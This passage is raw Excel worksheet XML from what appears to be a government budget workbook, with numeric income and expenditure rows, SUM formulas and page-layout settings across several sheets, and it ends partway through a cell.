    <row r="24" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A24" s="570" t="s">
        <v>295</v>
      </c>
      <c r="B24" s="571"/>
      <c r="C24" s="571"/>
    </row>
    <row r="25" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A25" s="570" t="s">
        <v>296</v>
      </c>
      <c r="B25" s="571">
        <v>934</v>
      </c>
      <c r="C25" s="571">
        <v>3900</v>
      </c>
    </row>
    <row r="26" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A26" s="570" t="s">
        <v>297</v>
      </c>
      <c r="B26" s="571"/>
      <c r="C26" s="571"/>
    </row>
    <row r="27" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A27" s="570" t="s">
        <v>298</v>
      </c>
      <c r="B27" s="571"/>
      <c r="C27" s="571"/>
    </row>
    <row r="28" spans="1:3" s="567" customFormat="1" ht="21" customHeight="1">
      <c r="A28" s="572" t="s">
        <v>450</v>
      </c>
      <c r="B28" s="572">
        <f>SUM(B5,B20)</f>
        <v>214607</v>
      </c>
      <c r="C28" s="572">
        <f>SUM(C5,C20)</f>
        <v>215000</v>
      </c>
    </row>
    <row r="29" spans="1:3" s="545" customFormat="1" ht="21" customHeight="1">
      <c r="A29" s="573" t="s">
        <v>300</v>
      </c>
      <c r="B29" s="574">
        <f>SUM(B30:B36)</f>
        <v>131426</v>
      </c>
      <c r="C29" s="574">
        <f>SUM(C30:C36)</f>
        <v>145779</v>
      </c>
    </row>
    <row r="30" spans="1:3" s="568" customFormat="1" ht="21" customHeight="1">
      <c r="A30" s="575" t="s">
        <v>301</v>
      </c>
      <c r="B30" s="472">
        <v>13960</v>
      </c>
      <c r="C30" s="576">
        <v>48900</v>
      </c>
    </row>
    <row r="31" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A31" s="577" t="s">
        <v>302</v>
      </c>
      <c r="B31" s="472">
        <v>6744</v>
      </c>
      <c r="C31" s="472">
        <v>6744</v>
      </c>
    </row>
    <row r="32" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A32" s="577" t="s">
        <v>303</v>
      </c>
      <c r="B32" s="472">
        <v>44200</v>
      </c>
      <c r="C32" s="576">
        <f>10760+24572</f>
        <v>35332</v>
      </c>
    </row>
    <row r="33" spans="1:9" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A33" s="577" t="s">
        <v>304</v>
      </c>
      <c r="B33" s="472">
        <v>10000</v>
      </c>
      <c r="C33" s="576">
        <v>12373</v>
      </c>
    </row>
    <row r="34" spans="1:9" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A34" s="577" t="s">
        <v>305</v>
      </c>
      <c r="B34" s="472">
        <v>16000</v>
      </c>
      <c r="C34" s="472">
        <v>35000</v>
      </c>
    </row>
    <row r="35" spans="1:9" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A35" s="577" t="s">
        <v>306</v>
      </c>
      <c r="B35" s="472">
        <v>20000</v>
      </c>
      <c r="C35" s="472"/>
    </row>
    <row r="36" spans="1:9" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A36" s="577" t="s">
        <v>307</v>
      </c>
      <c r="B36" s="472">
        <v>20522</v>
      </c>
      <c r="C36" s="576">
        <v>7430</v>
      </c>
    </row>
    <row r="37" spans="1:9" s="567" customFormat="1" ht="21" customHeight="1">
      <c r="A37" s="578" t="s">
        <v>308</v>
      </c>
      <c r="B37" s="574">
        <f>B28+B29</f>
        <v>346033</v>
      </c>
      <c r="C37" s="574">
        <f>C28+C29</f>
        <v>360779</v>
      </c>
      <c r="G37" s="579">
        <f>B37-'[1]1'!E38</f>
        <v>16100</v>
      </c>
      <c r="H37" s="579">
        <f>B37-'[1]12'!B35</f>
        <v>16100</v>
      </c>
      <c r="I37" s="579">
        <f>C37-'[1]12'!C35</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" spans="1:9" s="544" customFormat="1" ht="27.95" customHeight="1">
      <c r="A38" s="671"/>
      <c r="B38" s="671"/>
      <c r="C38" s="671"/>
    </row>
    <row r="39" spans="1:9" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="C39" s="580"/>
    </row>
    <row r="40" spans="1:9" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="C40" s="580"/>
    </row>
    <row r="41" spans="1:9" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="C41" s="580"/>
    </row>
    <row r="42" spans="1:9" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="C42" s="580"/>
    </row>
    <row r="43" spans="1:9" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="C43" s="580"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:C2"/>
    <mergeCell ref="A38:C38"/>
  </mergeCells>
  <phoneticPr fontId="54" type="noConversion"/>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.39305555555555599" right="0.39305555555555599" top="0.39305555555555599" bottom="0.39305555555555599" header="0.31041666666666701" footer="0.31041666666666701"/>
  <pageSetup paperSize="9" orientation="portrait" useFirstPageNumber="1" errors="NA"/>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zoomScale="89" zoomScaleNormal="89" workbookViewId="0">
      <pane ySplit="4" topLeftCell="A5" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="C7" sqref="C7"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.28515625" defaultRowHeight="21" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="47.140625" style="546" customWidth="1"/>
    <col min="2" max="2" width="16.7109375" style="546" customWidth="1"/>
    <col min="3" max="3" width="16.7109375" style="547" customWidth="1"/>
    <col min="4" max="16384" width="10.28515625" style="546"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" ht="24" customHeight="1">
      <c r="A1" s="548" t="s">
        <v>451</v>
      </c>
      <c r="B1" s="548"/>
      <c r="C1" s="549"/>
    </row>
    <row r="2" spans="1:3" s="541" customFormat="1" ht="24.95" customHeight="1">
      <c r="A2" s="670" t="s">
        <v>452</v>
      </c>
      <c r="B2" s="670"/>
      <c r="C2" s="670"/>
    </row>
    <row r="3" spans="1:3" s="542" customFormat="1" ht="24.95" customHeight="1">
      <c r="B3" s="550"/>
      <c r="C3" s="551" t="s">
        <v>270</v>
      </c>
    </row>
    <row r="4" spans="1:3" s="543" customFormat="1" ht="27.75" customHeight="1">
      <c r="A4" s="552" t="s">
        <v>344</v>
      </c>
      <c r="B4" s="552" t="s">
        <v>429</v>
      </c>
      <c r="C4" s="553" t="s">
        <v>449</v>
      </c>
    </row>
    <row r="5" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A5" s="280" t="s">
        <v>311</v>
      </c>
      <c r="B5" s="554">
        <v>29100</v>
      </c>
      <c r="C5" s="555">
        <v>27970</v>
      </c>
    </row>
    <row r="6" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A6" s="280" t="s">
        <v>312</v>
      </c>
      <c r="B6" s="554">
        <v>64</v>
      </c>
      <c r="C6" s="555">
        <v>42</v>
      </c>
    </row>
    <row r="7" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A7" s="280" t="s">
        <v>313</v>
      </c>
      <c r="B7" s="554">
        <v>9500</v>
      </c>
      <c r="C7" s="555">
        <v>8984</v>
      </c>
    </row>
    <row r="8" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A8" s="280" t="s">
        <v>314</v>
      </c>
      <c r="B8" s="554">
        <v>46000</v>
      </c>
      <c r="C8" s="555">
        <v>46546</v>
      </c>
    </row>
    <row r="9" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A9" s="280" t="s">
        <v>315</v>
      </c>
      <c r="B9" s="554">
        <v>13500</v>
      </c>
      <c r="C9" s="555">
        <v>6645</v>
      </c>
    </row>
    <row r="10" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A10" s="280" t="s">
        <v>316</v>
      </c>
      <c r="B10" s="554">
        <v>580</v>
      </c>
      <c r="C10" s="555">
        <v>367</v>
      </c>
    </row>
    <row r="11" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A11" s="280" t="s">
        <v>317</v>
      </c>
      <c r="B11" s="554">
        <v>19500</v>
      </c>
      <c r="C11" s="555">
        <v>22098</v>
      </c>
    </row>
    <row r="12" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A12" s="280" t="s">
        <v>318</v>
      </c>
      <c r="B12" s="554">
        <v>18500</v>
      </c>
      <c r="C12" s="555">
        <v>18408</v>
      </c>
    </row>
    <row r="13" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A13" s="280" t="s">
        <v>319</v>
      </c>
      <c r="B13" s="554">
        <v>600</v>
      </c>
      <c r="C13" s="555">
        <v>130</v>
      </c>
    </row>
    <row r="14" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A14" s="280" t="s">
        <v>320</v>
      </c>
      <c r="B14" s="554">
        <v>7000</v>
      </c>
      <c r="C14" s="555">
        <v>2782</v>
      </c>
    </row>
    <row r="15" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A15" s="280" t="s">
        <v>321</v>
      </c>
      <c r="B15" s="554">
        <v>16100</v>
      </c>
      <c r="C15" s="555">
        <v>17027</v>
      </c>
    </row>
    <row r="16" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A16" s="280" t="s">
        <v>322</v>
      </c>
      <c r="B16" s="554">
        <v>50</v>
      </c>
      <c r="C16" s="555">
        <v>1518</v>
      </c>
    </row>
    <row r="17" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A17" s="280" t="s">
        <v>323</v>
      </c>
      <c r="B17" s="554">
        <v>1356</v>
      </c>
      <c r="C17" s="555">
        <v>1102</v>
      </c>
    </row>
    <row r="18" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A18" s="280" t="s">
        <v>324</v>
      </c>
      <c r="B18" s="554">
        <v>2600</v>
      </c>
      <c r="C18" s="555">
        <v>1850</v>
      </c>
    </row>
    <row r="19" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A19" s="280" t="s">
        <v>325</v>
      </c>
      <c r="B19" s="554">
        <v>208</v>
      </c>
      <c r="C19" s="555"/>
    </row>
    <row r="20" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A20" s="280" t="s">
        <v>326</v>
      </c>
      <c r="B20" s="554"/>
      <c r="C20" s="555"/>
    </row>
    <row r="21" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A21" s="280" t="s">
        <v>327</v>
      </c>
      <c r="B21" s="554">
        <v>186</v>
      </c>
      <c r="C21" s="555">
        <v>101</v>
      </c>
    </row>
    <row r="22" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A22" s="280" t="s">
        <v>328</v>
      </c>
      <c r="B22" s="554">
        <v>10500</v>
      </c>
      <c r="C22" s="555">
        <v>10532</v>
      </c>
    </row>
    <row r="23" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A23" s="280" t="s">
        <v>329</v>
      </c>
      <c r="B23" s="554"/>
      <c r="C23" s="555"/>
    </row>
    <row r="24" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A24" s="280" t="s">
        <v>330</v>
      </c>
      <c r="B24" s="554">
        <v>2800</v>
      </c>
      <c r="C24" s="555">
        <v>2914</v>
      </c>
    </row>
    <row r="25" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A25" s="280" t="s">
        <v>331</v>
      </c>
      <c r="B25" s="554"/>
      <c r="C25" s="555">
        <v>2000</v>
      </c>
    </row>
    <row r="26" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A26" s="280" t="s">
        <v>332</v>
      </c>
      <c r="B26" s="554">
        <v>9542</v>
      </c>
      <c r="C26" s="555">
        <v>9392</v>
      </c>
    </row>
    <row r="27" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A27" s="280" t="s">
        <v>333</v>
      </c>
      <c r="B27" s="554"/>
      <c r="C27" s="555"/>
    </row>
    <row r="28" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A28" s="556" t="s">
        <v>453</v>
      </c>
      <c r="B28" s="556">
        <f>SUM(B5:B27)</f>
        <v>187686</v>
      </c>
      <c r="C28" s="556">
        <f>SUM(C5:C27)</f>
        <v>180408</v>
      </c>
    </row>
    <row r="29" spans="1:3" s="545" customFormat="1" ht="21" customHeight="1">
      <c r="A29" s="557" t="s">
        <v>335</v>
      </c>
      <c r="B29" s="558">
        <f>SUM(B30:B34)</f>
        <v>158347</v>
      </c>
      <c r="C29" s="558">
        <f>SUM(C30:C34)</f>
        <v>180371</v>
      </c>
    </row>
    <row r="30" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A30" s="559" t="s">
        <v>336</v>
      </c>
      <c r="B30" s="560">
        <v>14300</v>
      </c>
      <c r="C30" s="561">
        <v>51540</v>
      </c>
    </row>
    <row r="31" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A31" s="559" t="s">
        <v>337</v>
      </c>
      <c r="B31" s="560">
        <v>120617</v>
      </c>
      <c r="C31" s="561">
        <v>128831</v>
      </c>
    </row>
    <row r="32" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A32" s="562" t="s">
        <v>338</v>
      </c>
      <c r="B32" s="563">
        <v>16000</v>
      </c>
      <c r="C32" s="561"/>
    </row>
    <row r="33" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A33" s="562" t="s">
        <v>339</v>
      </c>
      <c r="B33" s="563"/>
      <c r="C33" s="561"/>
    </row>
    <row r="34" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A34" s="559" t="s">
        <v>340</v>
      </c>
      <c r="B34" s="560">
        <v>7430</v>
      </c>
      <c r="C34" s="561"/>
    </row>
    <row r="35" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="A35" s="564" t="s">
        <v>341</v>
      </c>
      <c r="B35" s="565">
        <f>B28+B29</f>
        <v>346033</v>
      </c>
      <c r="C35" s="565">
        <f>C28+C29</f>
        <v>360779</v>
      </c>
    </row>
    <row r="36" spans="1:3" s="544" customFormat="1" ht="18" customHeight="1">
      <c r="A36" s="672"/>
      <c r="B36" s="672"/>
      <c r="C36" s="672"/>
    </row>
    <row r="37" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="C37" s="566"/>
    </row>
    <row r="38" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="C38" s="566"/>
    </row>
    <row r="39" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="C39" s="566"/>
    </row>
    <row r="40" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="C40" s="566"/>
    </row>
    <row r="41" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="C41" s="566"/>
    </row>
    <row r="42" spans="1:3" s="544" customFormat="1" ht="21" customHeight="1">
      <c r="C42" s="566"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:C2"/>
    <mergeCell ref="A36:C36"/>
  </mergeCells>
  <phoneticPr fontId="54" type="noConversion"/>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.39305555555555599" right="0.39305555555555599" top="0.39305555555555599" bottom="0.39305555555555599" header="0.31041666666666701" footer="0.31041666666666701"/>
  <pageSetup paperSize="9" orientation="portrait" useFirstPageNumber="1" errors="NA"/>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08"/>
  <sheetViews>
    <sheetView showZeros="0" zoomScale="86" zoomScaleNormal="86" workbookViewId="0">
      <pane ySplit="5" topLeftCell="A6" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="D9" sqref="D9"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.85546875" defaultRowHeight="12.75"/>
  <cols>
    <col min="1" max="1" width="45.5703125" style="363" customWidth="1"/>
    <col min="2" max="4" width="16.7109375" style="364" customWidth="1"/>
    <col min="5" max="245" width="9.140625" style="356"/>
    <col min="246" max="255" width="8.85546875" style="356"/>
    <col min="256" max="16384" width="8.85546875" style="46"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4" s="356" customFormat="1" ht="27" customHeight="1">
      <c r="A1" s="346" t="s">
        <v>454</v>
      </c>
      <c r="B1" s="532"/>
      <c r="C1" s="532"/>
      <c r="D1" s="533"/>
    </row>
    <row r="2" spans="1:4" s="356" customFormat="1" ht="30" customHeight="1">
      <c r="A2" s="673" t="s">
        <v>455</v>
      </c>
      <c r="B2" s="673"/>
      <c r="C2" s="673"/>
      <c r="D2" s="673"/>
    </row>
    <row r="3" spans="1:4" s="357" customFormat="1" ht="21.95" customHeight="1">
      <c r="A3" s="674" t="s">
        <v>456</v>
      </c>
      <c r="B3" s="675"/>
      <c r="C3" s="675"/>
      <c r="D3" s="675"/>
    </row>
    <row r="4" spans="1:4" s="358" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A4" s="679" t="s">
        <v>457</v>
      </c>
      <c r="B4" s="676" t="s">
        <v>449</v>
      </c>
      <c r="C4" s="677"/>
      <c r="D4" s="678"/>
    </row>
    <row r="5" spans="1:4" s="358" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A5" s="680"/>
      <c r="B5" s="365" t="s">
        <v>383</v>
      </c>
      <c r="C5" s="365" t="s">
        <v>458</v>
      </c>
      <c r="D5" s="365" t="s">
        <v>459</v>
      </c>
    </row>
    <row r="6" spans="1:4" s="359" customFormat="1" ht="21" customHeight="1">
      <c r="A6" s="366" t="s">
        <v>383</v>
      </c>
      <c r="B6" s="366">
        <f>C6+D6</f>
        <v>180408</v>
      </c>
      <c r="C6" s="534">
        <f>C7+C12+C23+C27+C31+C33+C36+C42+C44+C46+C48</f>
        <v>74252</v>
      </c>
      <c r="D6" s="534">
        <f>D7+D12+D23+D27+D31+D33+D36+D42+D44+D46+D48</f>
        <v>106156</v>
      </c>
    </row>
    <row r="7" spans="1:4" s="360" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A7" s="367" t="s">
        <v>460</v>
      </c>
      <c r="B7" s="535">
        <f>C7+D7</f>
        <v>38547</v>
      </c>
      <c r="C7" s="535">
        <f>SUM(C8:C11)</f>
        <v>32518</v>
      </c>
      <c r="D7" s="535">
        <f>SUM(D8:D11)</f>
        <v>6029</v>
      </c>
    </row>
    <row r="8" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A8" s="369" t="s">
        <v>461</v>
      </c>
      <c r="B8" s="536">
        <v>30315</v>
      </c>
      <c r="C8" s="536">
        <v>25315</v>
      </c>
      <c r="D8" s="340">
        <v>5000</v>
      </c>
    </row>
    <row r="9" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A9" s="369" t="s">
        <v>462</v>
      </c>
      <c r="B9" s="536">
        <v>5301</v>
      </c>
      <c r="C9" s="536">
        <v>4701</v>
      </c>
      <c r="D9" s="340">
        <v>600</v>
      </c>
    </row>
    <row r="10" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A10" s="369" t="s">
        <v>463</v>
      </c>
      <c r="B10" s="536">
        <v>2460</v>
      </c>
      <c r="C10" s="536">
        <v>2460</v>
      </c>
      <c r="D10" s="340">
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A11" s="369" t="s">
        <v>464</v>
      </c>
      <c r="B11" s="536">
        <v>471</v>
      </c>
      <c r="C11" s="536">
        <v>42</v>
      </c>
      <c r="D11" s="340">
        <v>429</v>
      </c>
    </row>
    <row r="12" spans="1:4" s="360" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A12" s="367" t="s">
        <v>465</v>
      </c>
      <c r="B12" s="535">
        <f>C12+D12</f>
        <v>32126</v>
      </c>
      <c r="C12" s="535">
        <f>SUM(C13:C22)</f>
        <v>2869</v>
      </c>
      <c r="D12" s="535">
        <f>SUM(D13:D22)</f>
        <v>29257</v>
      </c>
    </row>
    <row r="13" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A13" s="369" t="s">
        <v>466</v>
      </c>
      <c r="B13" s="536">
        <v>6771</v>
      </c>
      <c r="C13" s="536">
        <v>1708</v>
      </c>
      <c r="D13" s="340">
        <v>5663</v>
      </c>
    </row>
    <row r="14" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A14" s="369" t="s">
        <v>467</v>
      </c>
      <c r="B14" s="536">
        <v>34</v>
      </c>
      <c r="C14" s="536">
        <v>7</v>
      </c>
      <c r="D14" s="340">
        <v>28</v>
      </c>
    </row>
    <row r="15" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A15" s="369" t="s">
        <v>468</v>
      </c>
      <c r="B15" s="536">
        <v>216</v>
      </c>
      <c r="C15" s="536">
        <v>42</v>
      </c>
      <c r="D15" s="340">
        <v>174</v>
      </c>
    </row>
    <row r="16" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A16" s="369" t="s">
        <v>469</v>
      </c>
      <c r="B16" s="536">
        <v>118</v>
      </c>
      <c r="C16" s="536">
        <v>0</v>
      </c>
      <c r="D16" s="340">
        <v>118</v>
      </c>
    </row>
    <row r="17" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A17" s="369" t="s">
        <v>470</v>
      </c>
      <c r="B17" s="536">
        <v>9972</v>
      </c>
      <c r="C17" s="536">
        <v>50</v>
      </c>
      <c r="D17" s="340">
        <v>9923</v>
      </c>
    </row>
    <row r="18" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A18" s="369" t="s">
        <v>471</v>
      </c>
      <c r="B18" s="536">
        <v>90</v>
      </c>
      <c r="C18" s="536">
        <v>24</v>
      </c>
      <c r="D18" s="340">
        <v>66</v>
      </c>
    </row>
    <row r="19" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A19" s="369" t="s">
        <v>472</v>
      </c>
      <c r="B19" s="536">
        <v>77</v>
      </c>
      <c r="C19" s="536">
        <v>5</v>
      </c>
      <c r="D19" s="340">
        <v>72</v>
      </c>
    </row>
    <row r="20" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A20" s="369" t="s">
        <v>473</v>
      </c>
      <c r="B20" s="536">
        <v>249</v>
      </c>
      <c r="C20" s="536">
        <v>249</v>
      </c>
      <c r="D20" s="340">
        <v>0</v>
      </c>
    </row>
    <row r="21" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A21" s="369" t="s">
        <v>474</v>
      </c>
      <c r="B21" s="536">
        <v>315</v>
      </c>
      <c r="C21" s="536">
        <v>85</v>
      </c>
      <c r="D21" s="340">
        <v>230</v>
      </c>
    </row>
    <row r="22" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A22" s="369" t="s">
        <v>475</v>
      </c>
      <c r="B22" s="536" t="s">
        <v>476</v>
      </c>
      <c r="C22" s="536">
        <v>699</v>
      </c>
      <c r="D22" s="340">
        <v>12983</v>
      </c>
    </row>
    <row r="23" spans="1:4" s="360" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A23" s="367" t="s">
        <v>477</v>
      </c>
      <c r="B23" s="535">
        <f>C23+D23</f>
        <v>15543</v>
      </c>
      <c r="C23" s="535">
        <f>SUM(C24:C26)</f>
        <v>30</v>
      </c>
      <c r="D23" s="535">
        <f>SUM(D24:D26)</f>
        <v>15513</v>
      </c>
    </row>
    <row r="24" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A24" s="369" t="s">
        <v>478</v>
      </c>
      <c r="B24" s="340">
        <v>1200</v>
      </c>
      <c r="C24" s="340">
        <v>0</v>
      </c>
      <c r="D24" s="340">
        <v>1200</v>
      </c>
    </row>
    <row r="25" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A25" s="369" t="s">
        <v>479</v>
      </c>
      <c r="B25" s="340">
        <v>2227</v>
      </c>
      <c r="C25" s="340">
        <v>30</v>
      </c>
      <c r="D25" s="340">
        <v>2197</v>
      </c>
    </row>
    <row r="26" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A26" s="369" t="s">
        <v>480</v>
      </c>
      <c r="B26" s="340">
        <v>12116</v>
      </c>
      <c r="C26" s="340">
        <v>0</v>
      </c>
      <c r="D26" s="340">
        <v>12116</v>
      </c>
    </row>
    <row r="27" spans="1:4" s="360" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A27" s="367" t="s">
        <v>481</v>
      </c>
      <c r="B27" s="535">
        <f>C27+D27</f>
        <v>49400</v>
      </c>
      <c r="C27" s="535">
        <f>SUM(C28:C30)</f>
        <v>36586</v>
      </c>
      <c r="D27" s="535">
        <f>SUM(D28:D30)</f>
        <v>12814</v>
      </c>
    </row>
    <row r="28" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A28" s="369" t="s">
        <v>482</v>
      </c>
      <c r="B28" s="340">
        <v>36587</v>
      </c>
      <c r="C28" s="340">
        <v>36586</v>
      </c>
      <c r="D28" s="340">
        <v>0</v>
      </c>
    </row>
    <row r="29" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A29" s="369" t="s">
        <v>483</v>
      </c>
      <c r="B29" s="340">
        <v>7377</v>
      </c>
      <c r="C29" s="340">
        <v>0</v>
      </c>
      <c r="D29" s="340">
        <v>7377</v>
      </c>
    </row>
    <row r="30" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A30" s="369" t="s">
        <v>484</v>
      </c>
      <c r="B30" s="340">
        <v>5437</v>
      </c>
      <c r="C30" s="340">
        <v>0</v>
      </c>
      <c r="D30" s="340">
        <v>5437</v>
      </c>
    </row>
    <row r="31" spans="1:4" s="360" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A31" s="367" t="s">
        <v>485</v>
      </c>
      <c r="B31" s="535">
        <f>C31+D31</f>
        <v>3451</v>
      </c>
      <c r="C31" s="535">
        <f>C32</f>
        <v>0</v>
      </c>
      <c r="D31" s="535">
        <f>D32</f>
        <v>3451</v>
      </c>
    </row>
    <row r="32" spans="1:4" s="360" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A32" s="369" t="s">
        <v>486</v>
      </c>
      <c r="B32" s="340">
        <v>3451</v>
      </c>
      <c r="C32" s="340">
        <v>0</v>
      </c>
      <c r="D32" s="340">
        <v>3451</v>
      </c>
    </row>
    <row r="33" spans="1:4" s="360" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A33" s="367" t="s">
        <v>487</v>
      </c>
      <c r="B33" s="535">
        <f>C33+D33</f>
        <v>10481</v>
      </c>
      <c r="C33" s="535">
        <f>SUM(C34:C35)</f>
        <v>0</v>
      </c>
      <c r="D33" s="535">
        <f>SUM(D34:D35)</f>
        <v>10481</v>
      </c>
    </row>
    <row r="34" spans="1:4" s="360" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A34" s="369" t="s">
        <v>488</v>
      </c>
      <c r="B34" s="340"/>
      <c r="C34" s="340"/>
      <c r="D34" s="340"/>
    </row>
    <row r="35" spans="1:4" s="360" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A35" s="369" t="s">
        <v>489</v>
      </c>
      <c r="B35" s="340">
        <v>10481</v>
      </c>
      <c r="C35" s="340">
        <v>0</v>
      </c>
      <c r="D35" s="340">
        <v>10481</v>
      </c>
    </row>
    <row r="36" spans="1:4" s="360" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A36" s="367" t="s">
        <v>490</v>
      </c>
      <c r="B36" s="535">
        <f>C36+D36</f>
        <v>14307</v>
      </c>
      <c r="C36" s="535">
        <f>SUM(C37:C41)</f>
        <v>2249</v>
      </c>
      <c r="D36" s="535">
        <f>SUM(D37:D41)</f>
        <v>12058</v>
      </c>
    </row>
    <row r="37" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A37" s="369" t="s">
        <v>491</v>
      </c>
      <c r="B37" s="536">
        <v>7563</v>
      </c>
      <c r="C37" s="536">
        <v>444</v>
      </c>
      <c r="D37" s="340">
        <v>7120</v>
      </c>
    </row>
    <row r="38" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A38" s="369" t="s">
        <v>492</v>
      </c>
      <c r="B38" s="536">
        <v>370</v>
      </c>
      <c r="C38" s="536">
        <v>0</v>
      </c>
      <c r="D38" s="340">
        <v>370</v>
      </c>
    </row>
    <row r="39" spans="1:4" s="361" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A39" s="369" t="s">
        <v>493</v>
      </c>
      <c r="B39" s="536">
        <v>94</v>
      </c>
      <c r="C39" s="536">
        <v>0</v>
      </c>
      <c r="D39" s="340">
        <v>94</v>
      </c>
    </row>
    <row r="40" spans="1:4" s="531" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A40" s="369" t="s">
        <v>494</v>
      </c>
      <c r="B40" s="536">
        <v>1740</v>
      </c>
      <c r="C40" s="536">
